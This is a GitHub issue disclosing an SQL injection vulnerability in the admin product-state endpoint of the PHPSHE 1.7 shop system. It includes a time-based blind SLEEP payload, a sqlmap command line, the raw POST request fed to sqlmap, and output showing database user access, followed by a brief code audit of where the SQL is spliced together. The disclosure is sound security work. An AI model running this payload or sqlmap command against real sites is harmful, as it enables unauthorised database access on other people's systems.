Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

PHPSHE1.7 admin.php SqlInjection Vulnerability #1

Open
kk98kk0 opened this issue Jan 3, 2019 · 0 comments
Open

PHPSHE1.7 admin.php SqlInjection Vulnerability #1

kk98kk0 opened this issue Jan 3, 2019 · 0 comments

Comments

@kk98kk0
Copy link
Owner

kk98kk0 commented Jan 3, 2019
edited
Loading

1.Vulnerability describes

Detection object:

(1) website name: PHPSHE CMS system V1.7

(2) website domain name: http://www.phpshe.com/

(3) the IP address: http://www.phpshe.com/down/phpshe1.7.rar

(4) version: PHPSHE B2C system v1.7 (build 20180905 UTF8)

Detection time:

January 3, 2019

Description of vulnerability:

Lingbao JianHao network technology co., LTD. PHPSHE CMS system - SQL injection vulnerability.

2.POC and verification

Local construction environment:

1, download PHPSHE V1.7 mall system at http://www.phpshe.com/down/phpshe1.7.rar

2, the background to http://localhost/phpshe1.7/admin.php, the user/password is admin/admin

  1. Verify by the following POC verification methods.
    Vulnerability injection point:
Parameter: Array-like #2* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: checkall=on&product_id[]=2' AND SLEEP(5) AND 'sTmn'='sTmn&product_order[2]=10000&product_id[]=1&product_order[1]=10000
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

vulnerability verification:
python sqlmap.py -r 11.txt --batch --random-agent -o -scope='localhost' --dbms=Mysql --current-user -v 5
11. TXT file contents:

POST /phpshe1.7/admin.php?mod=product&act=state&state=1&token=84ba604db8935c8201fa2af409f11741 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpshe1.7/admin.php?mod=product
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Connection: close
Cookie: DedeUserID=1; DedeUserID__ckMd5=c20c15deef949b98; DedeLoginTime=1546408186; DedeLoginTime__ckMd5=569b33049963c9a4; PHPSESSID=egoab0kobof5fo9b53tp1c3qq1; ENV_GOBACK_URL=%2Fuploads%2Fdede%2Fmedia_main.php; _csrf_name_f048d228=436e04b1a14714d2fe8e00a8535f45da; _csrf_name_f048d228__ckMd5=86dfb1e20aa6eb02
Upgrade-Insecure-Requests: 1

checkall=on&product_id%5B%5D=2&product_order%5B2%5D=10000&product_id%5B%5D=1&product_order%5B1%5D=10000

1

current user: 'root@localhost'

Code audit:
Setup the environment locally.

POST /phpshe1.7/admin.php?mod=product&act=state&state=1&token=84ba604db8935c8201fa2af409f11741

Line 87 of admin.php enters the product.php logic after the submission.

2

  1. Pe_update function updates the database
    product=product $product_id=(sql)$_g_state=state
    3

  2. Pe_update function calls _dowhere to process conditional statements.
    4

3._dowhere function Sql splicing.
5

  1. When sqlwhere statement is returned after splicing, please note that the malicious code has been spliced successfully
    6

  2. Finally, the database was updated successfully
    7
    8
    9
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@kk98kk0